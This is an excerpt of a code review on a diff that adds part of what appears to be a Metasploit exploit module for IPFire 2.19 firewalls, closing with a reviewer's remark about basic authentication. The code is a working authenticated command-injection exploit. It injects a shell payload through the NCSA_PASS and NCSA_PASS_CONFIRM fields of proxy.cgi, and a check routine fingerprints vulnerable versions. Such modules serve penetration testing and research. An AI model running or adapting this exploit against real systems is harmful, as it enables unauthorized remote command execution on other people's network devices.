modules/exploits/linux/http/ipfire_proxy_exec.rb

```diff
@@ -0,0 +1,117 @@
+        ],
+      'References'      =>
+        [
+          [ 'URL', 'https://www.exploit-db.com/exploits/39765/' ],
+          [ 'URL', 'www.ipfire.org/news/ipfire-2-19-core-update-101-released']
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Privileged'     => false,
+      'DefaultOptions' => { 'SSL' => true },
+      'Arch'           => [ ARCH_CMD ],
+      'Payload'        =>
+        {
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'perl awk openssl',
+            }
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic Target', { }]
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'May 04 2016',
+     ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', '']),
+        Opt::RPORT(444)
+      ], self.class)
+  end
+
+  def check()
+    begin
+      res = send_request_cgi({
+        'uri'       => '/cgi-bin/pakfire.cgi',
+        'method'    => 'GET',
+        'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
+      })
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
+      /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
+
+      if version && update && version == "2.19" && update.to_i < 101
+        Exploit::CheckCode::Vulnerable
+      else
+        Exploit::CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit()
+    begin
+      # To manually view the vuln page, click to proxy.cgi.  At the bottom
+      # select Local, and save. Ignore the error box, at the bottom of
+      # the page click the button: User Management.
+
+      payload_formatted = "||#{payload.encoded};#"
+      post_data =  "NCSA_USERNAME=#{Rex::Text.rand_text_alpha(10)}"
+      post_data << "&NCSA_GROUP=standard"
+      post_data << "&NCSA_PASS=#{Rex::Text.uri_encode(payload_formatted)}"
+      post_data << "&NCSA_PASS_CONFIRM=#{Rex::Text.uri_encode(payload_formatted)}"
+      post_data << "&SUBMIT=Create+user"
+      post_data << "&ACTION=Add"
+      post_data << "&NCSA_MIN_PASS_LEN=6"
+
+      res = send_request_cgi({
+        'uri'       => '/cgi-bin/proxy.cgi',
+        'method'    => 'POST',
+        'ctype'     => 'application/x-www-form-urlencoded',
+        'headers'   =>
+          {
+            'Referer'   => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/proxy.cgi"
+          },
+        'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']),
```

Comment:
Same as the previous feedback. The HttpClient should automatically do basic_auth for you.